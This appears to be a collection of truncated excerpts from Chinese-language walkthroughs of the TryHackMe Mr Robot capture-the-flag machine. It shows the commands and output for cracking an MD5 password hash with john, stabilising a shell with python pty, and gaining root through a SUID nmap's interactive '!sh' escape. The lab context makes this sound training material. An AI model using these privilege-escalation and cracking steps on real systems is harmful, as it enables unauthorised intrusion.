进入/home/robot目录,发现key-2-of-3.txt文件没有权限读取,但是password.raw-md5文件可以读取 将password.raw-md5很明显是一个hash密码文件,将文件内容复制到kali使用john进行破解 shell john --format=Raw-MD5 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 得到密码为·robot用户的密码为abcdefghijklmn...
#使用以下命令使初始shell稳定化python -c"import pty; pty.spawn('/bin/bash')" 由上图结果可知:robot的登录凭据已被加密处理;我们使用https://crackstation.net/进行在线解密即可: bash #robot:c3fcd3d76192e4007dfb496cca67e13b 解密结果-即robot用户的登录凭据为:abcdefghijklmnopqrstuvwxyz 使用得到的凭据切换...
$ curl -s http://10.10.185.196/robots.txt User-agent: * fsocity.dic key-1-of-3.txt unknown@localhost:/data/documents/challenges/TryHackMe/Mr_Robot_CTF$ curl -s http://10.10.185.196/key-1-of-3.txt 073403c8a58a1f80d943455fb30724b9...
robot@linux:~$ cat key-2-of-3.txt cat key-2-of-3.txt 822c73956184f694993bede3eb39f959 robot@linux:~$ 根据提示,查看nmap权限,发现是一个suid robot@linux:~$ whereis nmap whereis nmap nmap: /usr/local/bin/nmap robot@linux:~$ ls -al /usr/local/bin/nmap ls -al /usr/local/bin/...
robot@linux:~$ nmap --interactive nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help nmap> !sh !sh # id id uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot) # ls -alh /...